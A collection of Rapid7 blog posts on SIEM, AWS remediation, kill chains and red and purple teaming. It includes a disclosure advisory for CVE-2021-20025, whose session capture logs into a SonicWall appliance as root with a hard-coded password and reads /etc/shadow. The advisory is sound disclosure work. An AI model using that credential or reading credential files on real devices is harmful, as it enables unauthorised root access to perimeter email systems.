Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

Post Syndicated from Meaghan Donlon original https://blog.rapid7.com/2021/07/06/once-again-rapid7-named-a-leader-in-2021-gartner-magic-quadrant-for-siem/

Rapid7 is elated for InsightIDR to be recognized as a Leader in the 2021 Gartner Magic Quadrant for Security Information and Event Management (SIEM).

Once Again, Rapid7 Named a Leader in 2021 Gartner Magic Quadrant for SIEM

This is the second consecutive time our SaaS SIEM—InsightIDR—has been named a Leader in this report. Access the full complimentary report from us here.

The Gartner Magic Quadrant reports provide a matrix for evaluating technology vendors in a given space. The framework looks at vendors on two axes: completeness of vision and ability to execute. In the case of SIEM, “Gartner defines the security and information event management (SIEM) market by the customer’s need to analyze event data in real time for early detection of targeted attacks and data breaches, and to collect, store, investigate and report on log data for incident response, forensics and regulatory compliance.”

As the detection and response market becomes more competitive, and the demands and challenges of this space grow more complex, we are honored to be recognized as one of the six Leaders named in the 2021 Magic Quadrant. We believe we are recognized for our usability and customer experience, as these are areas we’ve invested heavily in and recognize as critical to the success of today’s detection and response programs.

"This Product has surpassed expectations" – Security Analyst, Energies and Utlities ★★★★★

Thank you

First and foremost, we want to thank our Rapid7 InsightIDR customers and partners for being on this journey with us. Your ongoing feedback, partnership, and trust have fueled our innovation and uncompromising commitment to delivering sophisticated security outcomes that are accessible to all.

Access the full 2021 Gartner Magic Quadrant report here.

Accelerated change escalates challenges around modern detection and response

The last year has brought a swell of change for many organizations, including rapid cloud adoption, increased use of web applications, a significant shift to remote working, and new threats brought on by attackers exploiting circumstances around the pandemic. While these challenges weren’t new, their increased urgency highlighted cracks in an already fragile security ecosystem:

  • Increased cybersecurity demands widened the already growing skills gap
  • Uptime trumped security, often leaving SecOps professionals scrambling to keep up
  • The combination of these stresses drove many teams to a breaking point with alert fatigue

These market dynamics prompted a lot of Security Operations Center (SOC) teams to reevaluate current processes and systems, and push for change.

Rapid7 InsightIDR helps teams focus on what matters most to drive effective threat detection and response across modern IT environments

Our approach to detection and response has always been directed by what we hear from customers. This includes industry engagement and insights gathered through Rapid7’s research and open source communities, our firsthand experience with Rapid7 MDR (Managed Detection and Response) and services engagements, and of course, direct customer feedback. These collective learnings have enabled us to deeply understand the challenges facing SOC teams today, and pushed us to develop innovative solutions to anticipate and address their needs.

Rapid7 InsightIDR is not another log-aggregation-focused SIEM that sits on the shelf, or one that leaves the difficult and tedious work for security analysts to figure out on their own. Rather, our focus has always been to provide immediate, actionable insights and alerts that teams can feel confident responding to so they can extinguish threats quickly. With Rapid7 InsightIDR, security analysts are no longer fighting just to keep up. They’re empowered to scale and transform their security programs, however and wherever their environments evolve.

We are thrilled about this recognition, but like everything in cybersecurity, what’s most exciting is what happens next. We are committed to continually raising the bar and making it easier for SOC teams to accelerate their detection and response programs, while removing the distractions and noise that get in the way. Thank you again to our customers and partners for joining this journey with us. And stay tuned for more updates ahead soon!

"InsightIDR is my favorite SIEM because the preloaded detections for attacker tactics and techniques. The threat community within the platform is always providing new detections for IOCs. The team is always pleasant to work with, and I love all the feature updates we received this year!" – Information Security Engineer ★★★★★

Access the full 2021 Gartner Magic Quadrant report here.

This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Rapid7.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner Magic Quadrant for Security Information and Event Management (SIEM), Kelly Kavanagh, Toby Bussa, John Collins, 29 June 2021.

Automated remediation level 4: Actual automation

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/07/06/automated-remediation-level-4-actual-automation/

Let’s get to automatically remediating already!

Automated remediation level 4: Actual automation

This entry will be the last in our series based on The 4 Levels of Automated Remediation. After the previous 3 steps—where we discussed everything from logging to best practices to account hygiene—it’s time to talk about the actions that really let you calibrate and control the kind of remediation you’re looking to get out of the process. We’ll once again use AWS as our case study and jumping-off point for keeping your cloud environments clean and (as) free (as possible) of misconfigurations at this “classic” level of automated remediation.

Key off on APIs

Deactivate them. If they’re old, that is. Since API keys essentially authenticate traffic for 2 things that really need to talk to each other, it’s a good rule of thumb to regularly and continually “rotate” your API keys so that anyone—or anything—with malicious intent is kept guessing. This is probably the most obvious hygiene action we’ll discuss here. The AWS Secrets Manager platform enables:

  • Creation and protection of “secrets” that manage API keys
  • Rotation of API keys
  • Auditing of credential rotation for your cloud resources
  • Scheduled/automatic rotation of keys, aka secrets

Delete the nondescriptors

Those newly provisioned Security Group (SG) rules may not have a description. Why would that be? When you find one, the reason doesn’t really matter. They’re liabilities, and they should be deleted. SG rules allow you to really get into the fine-grained nitty gritty of control over the traffic moving in and out of instances on your cloud infrastructure.

If an SG rule is indeed newly provisioned and lacks a descriptor, odds are it isn’t a priority and workflow isn’t dependent on it. Security Group rules are supposed to simplify operations, so if it does the opposite of that by being a mystery, then simplify it by getting rid of it.      

Tear up the untagged

More to the point, it’s another good hygiene rule of thumb to delete instances that aren’t properly tagged. The whole point of tagging, much like adding descriptions, is to quickly categorize and find all of your many resources. Thus, if something isn’t tagged as it should be or you stumble upon an instance that is wholly untagged, then it’s time for it to go. But as stated in this AWS tagging guide, you must be specific about your deletion process:

You can’t terminate, stop, or delete a resource based solely on its tags; you must specify the resource identifier. For example, to delete snapshots that you tagged with a tag key called DeleteMe, you must use the DeleteSnapshots action with the resource identifiers of the snapshots, such as snap-1234567890abcdef0.

Privatize public buckets

As AWS also states, new S3 buckets do not allow public access. However, much like the context surrounding the suggestions above, somewhere along the way public access was granted for one reason or another, and vulnerabilities were created. So here’s another good hygiene rule of thumb: zero out Access Control Lists (ACLs); they’re what you would use to grant public access to buckets. It’s also a good idea to activate all “block public access” settings.

Ready to rock (automated) remediation?

If your team is ready to activate automated remediation, good for you. Learning all 4 levels of automated remediation will also allow your organization to gradually become acquainted with the process and ultimately strengthen your cloud security.

The 4 Levels: Read an overview

Automated remediation level 3: Governance and hygiene

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/28/automated-remediation-level-3-governance-and-hygiene/

Mold it, make it, just don’t fake it

Automated remediation level 3: Governance and hygiene

At a quick glance, it seems like the title of this blog is “government hygiene.” Most likely, that wouldn’t be a particularly exciting read, but we’re hoping you might be engaged enough to gain a few takeaways from this fourth piece in our series on automating remediation and how it can benefit your team and cost center.

The best way to mold a solution that makes sense for your company and cloud security is by adding actions that cause the fewest deviations in your day-to-day operations. Of course, there are several best-practice use cases that can make sense for your organization. Let’s take a look at a few so you can decide which one(s) work(s) for you.

Environment enforcement

Sandboxes are designed to be safe spaces, so they should also be clean spaces. As Software Development Life Cycles (SDLC) accelerate and security posture moves increasingly left into the hands of the developers spinning things up, it’s important to not only isolate and lock down your sandbox space, but to create a repeat cleaning schedule. Your software release cycle can also act as regularly scheduled sandbox maintenance.

No exemptions for expensive instances

Spinning up instances that suck up resources from other critical applications can cost you. Sometimes they’re necessary, often they’re not. Whether it’s by cost, family type, or hardware specs, continuous monitoring is key so that even when unnecessarily resource-intensive processes aren’t automatically killed, you still have a good idea of what’s costing too much time and too much money. AWS CloudWatch, for instance, can help you monitor EC2 instances by stopping and starting them at scheduled intervals.

Cleanliness ≠ costliness

Properly automating anything in cloud security is ultimately going to save money for the organization. But, as we’ve discussed to some extent above and throughout this series, you’ll want to make sure automation isn’t creating unnecessary instances, orphaning outdated resources, or stagnating old snapshots and unused databases. Yep, there are a lot of things that can start to add up and begin puffing out a budget. Creating more efficient data pipelines and discovering which parts of the remediation process are the most labor-intensive can help identify where you should focus effort and resources. In this way, you can begin to target those areas that will require the most regular hygiene and cleanup.

Put a cork in the port (exposure)

Since everything on the internet is communicated and transferred via ports, it’s probably a good idea to think about locking down exposed ports that may be running protocols like Secure Shell (SSH) or Remote Desktop Protocol (RDP). Automating this type of cleanup will require knowing, similar to the above section, which ports do most of the heavy lifting in the daily rhythms of your cloud security operations. If a port isn’t being used in a meaningful way — or you simply don’t have any idea what its use is — best to shut it down.

Stay vigilant while basking in benefits

Ensuring your automation framework is as organized as possible takes work, but it’s considerably less work than having no framework at all. Automating good governance and hygiene practices adds time saved to the overall benefits gained from this work. But we must all be good monitors of these processes and put checks in place to ensure the automation framework actually works for you and continues to save time and effort for years to come.

With that, we’re ready for a deep dive into the last of the 4 Levels of Automated Remediation. You can also read the previous entry in this series here.

Level 4 coming soon!

Kill Chains: Part 3→What’s Next

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/25/kill-chains-part-3-whats-next/

Kill Chains: Part 3→What’s Next

Life, the Universe, and Kill Chains

As the final entry in this blog series, we want to quickly recap what we have previously discussed and also look into the possible future of kill chains. If you haven’t already done so, please make sure to read the previous 2 entries in this series: Kill chains: Part 1→Strategic and operational value, and Kill chains: Part 2 →Strategic and tactical use cases.

Fun with Graphs

In an effort to save time (and your sanity) I’ve created the following graph to illustrate the differences between the different kill chains:

Kill Chains: Part 3→What’s Next

What’s the bottom line? To paraphrase a line from the film The Gentlemen, “for (almost) every use case there is a kill chain, and for every kill chain a strategy.” Focused on malware defense or security awareness? The Cyber Kill Chain is worth a look. Need to assess your operational capabilities? MITRE ATT&CK. Looking to accurately model the behavior of attackers? Unified Kill Chain is “the way” (#mandalorian).

The Future

The kill chains of today (Lockheed Martin Cyber Kill Chain, MITRE ATT&CK, Unified Kill Chain) can trace their origins to a model first proposed by the military in the late 1990s known as F2T2EA (find, fix, track, target, engage, and assess). However, as we all know, attackers and their attacks evolve over time—and the rate at which they are evolving continues to accelerate. Since our kill chains evolved from military strategy, it only makes sense to look at what’s happened in military strategy since the 90s to get a glimpse of where the evolution of the cyber kill chains may be heading.

A newer model used by special operators is F3EAD (find, fix, finish, exploit, analyze, and disseminate). Let’s take a quick look at how this applies to cyber operations:

  • Find: Ask “who, what, where, when, why” when looking at an event
  • Fix: Verify what was discovered in the previous phase (true positive / false positive)
  • Finish: Use the information from the previous 2 phases to determine a course of action and degrade/eliminate the threat
  • Exploit: Identify IOCs using information from the previous phases
  • Analyze: Fuse your self-generated intelligence with third-party sources to identify any additional anomalous activity occurring in the environment
  • Disseminate: Distribute the results of the previous phases within the Security Operations Center (SOC) and to additional key stakeholders

One thing missing from the F3EAD model when applied to cyber operations is the inclusion of automation, aka Security Orchestration, Automation, and Response (SOAR). The gains in efficiency can greatly increase the speed at which the finish, exploit, and analyze phases can be completed. The first two phases, find and fix, are ones I believe still require the human touch due to the “fuzzy” (aka contextual) nature of events occurring within an organization.

The TLDR of the above? The future of kill chains must include the fusion of intelligence and automation without removing the human element from the equation. Until the equivalent of Skynet is invented, i.e. a truly sentient version of artificial intelligence capable of thinking in abstract ways, the “gut feeling” an analyst or incident responder gets when examining data will continue to be an advantage for us regular humans. Pairing this with the unmatched efficiency and speed gained by utilizing SOAR = winning!

The Verdict

Kill chains represent a comprehensive way to think about and visualize cyber attacks. Being able to communicate using a common lexicon (i.e. the terms and concepts in a kill chain) is critical to helping all levels of your organization understand the importance of security. However, I fear another fracturing of our lexicon will occur as more and newer versions of kill chains are introduced. Additionally, there appears to be an overreliance on only detecting and preventing the Tactics, Techniques, and Procedures (TTPs) found within these frameworks. Attackers have proven to be incredibly creative and endlessly resourceful, so their TTPs are going to change and evolve in ways we cannot yet imagine. This doesn’t mean we should discount the importance of using kill chains as part of our toolkit, but it should remain a part of our kit, and not the gold standard by which we judge the effectiveness of the security programs we have created.  

——————

Jeffrey Gardner, Practice Advisor for Detection and Response at Rapid7, recently presented a deep dive into all things kill chain. In it, he discusses how these methodologies can help your security organization cut down on threats and drastically reduce breach response times. You can also read the previous entries in this series for a general overview of kill chains and the specific frameworks we’ve discussed.

Watch the webcast now

Go back and read Part 1→Strategic and operational value, or Part 2 →Strategic and tactical use cases

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null root@192.168.123.251
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
root@192.168.123.251's password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic to allow for malicious email to pass undetected to further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

Attack Surface Analysis Part 3: Red and Purple Teaming

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/22/attack-surface-analysis-part-3-red-and-purple-teaming/

Part 3: Red and Purple Teaming

Attack Surface Analysis Part 3: Red and Purple Teaming

This is the third and final installment in our 2021 series on attack surface analysis. In Part 1, I described vulnerability assessment along with its value and challenges. Part 2 explored the why and how of conducting penetration testing and gave some tips on what to look for when planning an engagement. In this installment, I'll detail the final two analysis techniques: red and purple teaming.

Previously, we rather generically defined a red team engagement as a capabilities assessment. It's time to get a little more specific with our terminology, using a better definition once again courtesy of NIST:

“A [red team is a] group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The Red Team’s objective is to improve enterprise cybersecurity by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.”

(Source: https://csrc.nist.gov/glossary/term/Red_Team)

If you’re scratching your head about now, thinking, “Well, that sounds awfully similar to a pentest,” I’ve put together the following table to help illustrate the differences:

Attack Surface Analysis Part 3: Red and Purple Teaming

Additionally, like the various methodologies available for pentesting, red teams have different options in how they perform their engagements. The most common methodology that many of you have no doubt heard of is the MITRE ATT&CK framework, but there are others out there. Each of the options below has a different focus, whether it be red teaming for financial services or threat intel-based red teaming, so there is a flavor available to meet your needs:

  1. TIBER-EU—Threat Intelligence-Based Ethical Red Teaming Framework
  2. CBEST—Framework originating in the UK
  3. iCAST—Intelligence-Led Cyber Attack Simulation Testing
  4. FEER—Financial Entities Ethical Red Teaming
  5. AASE—Adversarial Attack Simulation Exercises
  6. NATO—CCDCOE red team framework

You may be thinking, “There’s no way I can stand up an internal red team, and I don’t have the budget for a professional engagement, but I would really like to test my blue team. How can I do this on my own!?” Well, you don’t have to! There are plenty of open source tools available to help you take that first step. While the following tools are nowhere near as capable or extensive as a human-led team, they do give a number of useful insights into potential weaknesses in your detection and response capabilities:

  1. APTSimulator—Batch script for Windows that makes it look as if a system were compromised
  2. Atomic Red Team—Detection tests mapped to the MITRE ATT&CK framework
  3. AutoTTP—Automated Tactics, Techniques & Procedures
  4. Blue Team Training Toolkit (BT3)—Software for defensive security training
  5. Caldera—Automated adversary emulation system by MITRE that performs post-compromise adversarial behavior within Windows networks
  6. DumpsterFire—Cross-platform tool for building repeatable, time-delayed, distributed security events
  7. Metta—Information security preparedness tool
  8. Network Flight Simulator—Utility used to generate malicious network traffic and help teams to evaluate network-based controls and overall visibility
  9. Red Team Automation (RTA)—Framework of scripts designed to allow blue teams to test their capabilities, modeled after MITRE ATT&CK
  10. RedHunt-OS—Virtual machine loaded with a number of tools designed for adversary emulation and threat hunting

Lastly, before we head into a description of purple teaming, I want to reiterate what we’ve discussed thus far. The goal of a red team engagement is not just discovering gaps in an organization’s detection and response capabilities. The purpose is to uncover the blue team’s weaknesses in terms of processes, coordination, communication, etc., with the list of detection gaps being a byproduct of the engagement itself.

Purple Teaming

While the name may give away the upcoming discussion (red team + blue team = purple team), the purpose of the purple team is to enhance information sharing between both teams, not to replace or combine either team into a new entity.

  • Red Team = Tests an organization’s defensive processes, coordination, etc.
  • Blue Team = Understands attacker TTPs and designs defenses accordingly
  • Purple Team = Ensures both teams are cooperating
  • Red teams should share TTPs with the blue team
  • Blue teams should share knowledge of defensive actions with the red team

Realistically, if both of your teams are already doing this, then congratulations! You have a functional purple team. However, if you’re like me and are a fan of more form and structure, check out the illustration below:

Attack Surface Analysis Part 3: Red and Purple Teaming

(Source: https://github.com/DefensiveOrigins/AtomicPurpleTeam)

Seems pretty simple, right? In theory it is, but in practice it gets a little more difficult (though probably not in the way you’re thinking). The biggest hurdle to effective purple teaming is helping the blue and red teams overcome the competitiveness that exists between them. Team Blue doesn’t want to give away how they catch bad guys, and Team Red doesn’t want to give away the secrets of the dark arts. By breaking down those walls, you can show Blue that understanding how Red operates makes them better defenders, and show Red that expanding their knowledge of defensive operations in partnership with Blue makes them more effective. In this way, the teams will actually want to work together (and dogs and cats will start living together, MASS HYSTERIA).

I hope the information above is helpful as you determine which analysis strategy makes sense for you! Check out the other posts in this series for more information on additional analysis techniques to take your program to the next level:

Part 1: Vulnerability Scanning | Part 2: Penetration Testing

Automated remediation level 2: Best practices

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/22/automated-remediation-level-2-best-practices/

A low-impact workaround

Automated remediation level 2: Best practices

When it comes to automating remediation, the second level we’ll discuss takes a bit of additional planning, so that users see little to no impact from the account-fundamentals automation process.

This framework aligns with the Center for Internet Security Amazon Web Services (CIS AWS) benchmark, which helps security organizations assess and improve processes by providing a set of unbiased industry best practices. Again, planning is the key to calibrating automation properly and maintaining your cloud security hygiene. In this second level, let’s take a look at three housekeeping best practices that can have a tremendous impact when it comes to automating remediation.

Organize the unused

Security groups act as a sort of traffic control checkpoint. Specifically, AWS Launch Wizard will automatically create security groups that define inbound traffic. If you’re not careful, many of these groups could go unused and subsequently become vulnerabilities. Think of it this way: if a security group isn’t attached to an instance, why would you leave it hanging around, especially if it can be exploited?

This is why it’s a good idea to perform regular maintenance of these groups. If Launch Wizard is automatically provisioning resources, then the “why” of it all should be understood by all key players so that automation doesn’t create chaos and continues to work for you.
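
As a rough illustration of what that maintenance can look like when automated, here is a minimal Python sketch using boto3 that flags security groups not attached to any network interface in a region. Treat it as a hedged starting point rather than a complete audit: it ignores groups referenced only by other groups' rules, and the region name is just a placeholder.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # placeholder region

# Collect the security groups currently referenced by at least one network interface
in_use = set()
for page in ec2.get_paginator("describe_network_interfaces").paginate():
    for eni in page["NetworkInterfaces"]:
        for group in eni["Groups"]:
            in_use.add(group["GroupId"])

# Flag every group that is not attached anywhere (defaults are skipped; they cannot be deleted)
for page in ec2.get_paginator("describe_security_groups").paginate():
    for sg in page["SecurityGroups"]:
        if sg["GroupId"] not in in_use and sg["GroupName"] != "default":
            print(f"Unused security group: {sg['GroupId']} ({sg['GroupName']})")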

Delete the defaults

You should control and calibrate the rules that best suit the organization and its workflows. As such, a tip from your friendly team at Rapid7 for good housekeeping is to delete default rules for default security groups. In AWS, for example, if you don’t specify a group alignment for an instance, it’ll be assigned to the default security group. A default security group has an inbound default rule and an outbound default rule.

  • The inbound default rule opens the gates to inbound traffic from all instances aligned with a default security group.
  • The outbound default rule grants permission to all outbound traffic from any instance aligned with the same default security group.  

Ensuring you have maximum control and visibility over that inbound and outbound traffic is just good hygiene, and will put checks on the process of creating default instances and any rules associated with them.
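
To make this housekeeping concrete, below is a small boto3 sketch that strips the inbound and outbound rules from every default security group in a region, leaving the groups themselves in place (they can't be deleted). It's an illustration of the idea under those assumptions, not a drop-in tool, so test it somewhere safe first.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # placeholder region

# Find every default security group in the region
default_groups = ec2.describe_security_groups(
    Filters=[{"Name": "group-name", "Values": ["default"]}]
)["SecurityGroups"]

for sg in default_groups:
    # Revoke the default inbound rule (traffic from members of the same group)
    if sg.get("IpPermissions"):
        ec2.revoke_security_group_ingress(GroupId=sg["GroupId"], IpPermissions=sg["IpPermissions"])
    # Revoke the default outbound rule (all traffic to anywhere)
    if sg.get("IpPermissionsEgress"):
        ec2.revoke_security_group_egress(GroupId=sg["GroupId"], IpPermissions=sg["IpPermissionsEgress"])
    print(f"Stripped default rules from {sg['GroupId']} in VPC {sg.get('VpcId')}")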

Protect AMI privacy

Ensuring the privacy status of an Amazon Machine Image (AMI) is also good hygiene. Essentially, setting an AMI to private enables individual access—so you and only you can use it—or you can assign access privileges to a specific list. This crucial step continues the best practice of closing your monitoring and cloud-security loops to fit the needs of your organization.
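
Here is a quick sketch of what enforcing that privacy might look like with boto3: it examines the AMIs owned by the account and removes the public launch permission from any that are shared with everyone. The region is a placeholder, and in practice you'd likely want to review each image before flipping it.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # placeholder region

# Look only at AMIs owned by this account
for image in ec2.describe_images(Owners=["self"])["Images"]:
    if image.get("Public"):
        # Remove the "all" launch permission so the AMI is no longer publicly usable
        ec2.modify_image_attribute(
            ImageId=image["ImageId"],
            LaunchPermission={"Remove": [{"Group": "all"}]},
        )
        print(f"Set AMI {image['ImageId']} to private")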

Stay in best-practice mode

If it seems like these 3 routines and rhythms are fundamentals of configuring automated remediation, that’s because they are. The thing is (and here’s another mention of the word), constant calibration is key in configuration processes. When there are so many details to lock into place, that’s when automation and its lasting benefits begin to make the most sense.

With that, we’re ready for a deep dive into the third of the 4 Levels of Automated Remediation. You can also read the previous entry in this series here.

Level 3: Governance and hygiene

Read now

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/22/how-to-combat-alert-fatigue-with-cloud-based-siem-tools/

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Today’s security teams are facing more complexity than ever before. IT environments are changing and expanding rapidly, resulting in proliferating data as organizations adopt more tools to stay on top of their sprawling environments. And with an abundance of tools comes an abundance of alerts, leading to the inevitable alert fatigue for security operations teams. Research completed by Enterprise Strategy Group determined 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50. That means thousands (or tens of thousands!) of alerts daily, depending on the organization’s size.

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM. Here are a few key ways a cloud-based SIEM can help combat alert fatigue to accelerate threat detection and response.

Access all of your critical security data in one place

Traditional SIEMs focus primarily on log management and are centered around compliance instead of giving you a full picture of your network. The rigidity of these outdated solutions is the opposite of what today’s agile teams need. A cloud SIEM can unify diverse data sets across on-premises, remote, and cloud environments, to provide security operations teams with the holistic visibility they need in one place, eliminating the need to jump in and out of multiple tools (and the thousands of alerts that they produce).

With modern cloud SIEMs like Rapid7’s InsightIDR, you can collect more than just logs from across your environment and ingest data including user activity, cloud, endpoints, and network traffic—all into a single solution. With your data in one place, cloud SIEMs deliver meaningful context and prioritization to help you avoid an abundance of alerts.

Cut through the noise to detect attacks early in the attack chain

By analyzing all of your data together, a cloud SIEM uses machine learning to better recognize patterns in your environment to understand what’s normal and what’s a potential threat. The result? More fine-tuned detections so your team is only alerted when there are real signs of a threat.

Instead of bogging you down with false positives, cloud SIEMs provide contextual, actionable alerts. InsightIDR offers customers high-quality, out-of-the-box alerts created and curated by our expert analysts based on real threats—so you can stop attacks early in the attack chain instead of sifting through a mountain of data and worthless alerts.

Accelerate response with automation

With automation, you can reduce alert fatigue and further improve your SOC’s efficiency. By leveraging a cloud SIEM that has built-in automation, or has the ability to integrate with a security orchestration and automation (SOAR) tool, your SOC can offload a significant amount of their workload and free up analysts to focus on what matters most, all while still improving security posture.

A cloud SIEM with expert-driven detections and built-in automation enables security teams to respond to and remediate attacks in a fraction of the time, instead of manually investigating thousands of alerts. InsightIDR integrates seamlessly with InsightConnect, Rapid7’s security orchestration and automation response (SOAR) tool, to reduce alert fatigue, automate containment, and improve investigation handling.

With holistic network visibility and advanced analysis, cloud-based SIEM tools provide teams with high context alerts and correlation to fight alert fatigue and accelerate incident detection and response. Learn more about how InsightIDR can help eliminate alert fatigue and more by checking out our outcomes pages.


Why More Teams are Shifting Security Analytics to the Cloud This Year

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/17/why-more-teams-are-shifting-security-analytics-to-the-cloud-this-year/

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed. An ESG study found that 63% of organizations say security is more difficult than it was two years ago. Teams cite the growing attack surface, increasing alert volume, and limited staff bandwidth as key reasons.

For their research, ESG surveyed hundreds of IT and cybersecurity professionals to gain more insights into strategies for driving successful security analytics and operations. Read the highlights of their study below, and check out the full ebook, “The Rise of Cloud-Based Security Analytics and Operations Technologies,” here.

The attack surface continues to grow as cloud adoption soars

Many organizations have been adopting cloud solutions, giving teams more visibility across their environments, while at the same time expanding their attack surface. The trend toward the cloud is only continuing to increase—ESG’s research found that 82% of organizations are dedicated to moving a significant amount of their workload and applications to the public cloud. The surge in remote work over the past year has arguably only amplified this, making it even more critical for teams to have detection and response programs that are more effective and efficient than ever before.

Organizations are looking toward consolidation to streamline incident detection and response

ESG found that 70% of organizations are using a SIEM tool today, as well as an assortment of other point solutions, such as an EDR or network traffic analysis solution. While this fixes the visibility issue plaguing security teams today, it doesn’t help with streamlining detection and response, which is likely why 36% of cybersecurity professionals say integrating disparate security analytics and operations tools is one of their organization’s highest priorities. Consolidating solutions drastically cuts down on false-positive alerts, eliminating the noise and confusion of managing multiple tools.

Combat complexity and drive efficiency with the right cloud solution

A detection and response solution that can correlate all of your valuable security data in one place is key for accelerated detection and response across the sprawling attack surface. Rapid7’s InsightIDR provides advanced visibility by automatically ingesting data from across your environment—including logs, endpoints, network traffic, cloud, and user activity—into a single solution, eliminating the need to jump in and out of multiple tools and giving hours back to your team. And with pre-built automation workflows, you can take action directly from within InsightIDR.

See ESG’s findings on cloud-based solutions, automation/orchestration, machine learning, and more by accessing “The Rise of Cloud-Based Security Analytics and Operations Technologies” ebook.


Monitor Google Cloud Platform (GCP) Data With InsightIDR

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/16/monitor-google-cloud-platform-gcp-data-with-insightidr/

Monitor Google Cloud Platform (GCP) Data With InsightIDR

InsightIDR was built in the cloud to support dynamic and rapidly changing environments—including remote workers, hybrid cloud and on-premises architectures, and fully cloud environments. Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly dispersed security environments. According to the 2020 IDG Cloud Computing Survey, 92% of organizations’ IT environments are at least somewhat in the cloud today, and more than half use multiple public clouds.

Google Cloud Platform (GCP) is one of the top cloud providers in 2021, and is trusted by leading companies across industries to help monitor their multi-cloud or hybrid environments. With a wide reach—GCP is available in over 200 countries and territories—it’s no wonder why.

To further provide support and monitoring capabilities for our customers, we recently added Google Cloud Platform (GCP) as an event source in InsightIDR. With this new integration, you’ll be able to collect user ingress events, administrative activity, and log data generated by GCP to monitor running instances and account activity within InsightIDR. You can also send firewall events to generate firewall alerts in InsightIDR, and threat detection logs to generate third-party alerts.

This new integration allows you to collect GCP data alongside your other security data in InsightIDR for expert alerting and more streamlined analysis of data across your environment.

Find Google Cloud threats fast with InsightIDR

Once you add GCP support, InsightIDR will be able to see users logging in to Google Cloud as ingress events as if they were connecting to the corporate network via VPN, allowing teams to:

  • Detect when ingress activity is coming from an untrusted source, such as a threat IP or an unusual foreign country.
  • Detect when users are logging into your corporate network and/or your Google Cloud environment from multiple countries at the same time, which should be impossible and is an indicator of a compromised account.
  • Detect when a user that has been disabled in your corporate network successfully authenticates to your Google Cloud environment, which may indicate a terminated employee has not had their access revoked from GCP and is now connected to the GCP environment.
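
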